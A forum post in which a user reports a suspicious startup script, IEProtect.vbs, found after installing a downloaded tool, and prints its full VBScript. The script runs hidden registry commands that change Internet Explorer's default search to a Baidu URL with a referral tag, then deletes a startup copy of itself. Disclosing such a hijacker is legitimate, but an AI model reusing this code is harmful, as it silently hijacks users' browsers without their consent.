|
|
Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016
Found a suspicious file after use in system:
%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProtect.vbs
IEProtect.vbs
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide
[ 本帖最后由 tanjianwen 于 2010-5-16 03:30 编辑 ] |
|